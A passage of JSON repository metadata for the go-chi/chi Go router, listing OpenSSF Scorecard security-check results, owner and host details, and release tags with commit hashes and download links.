security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: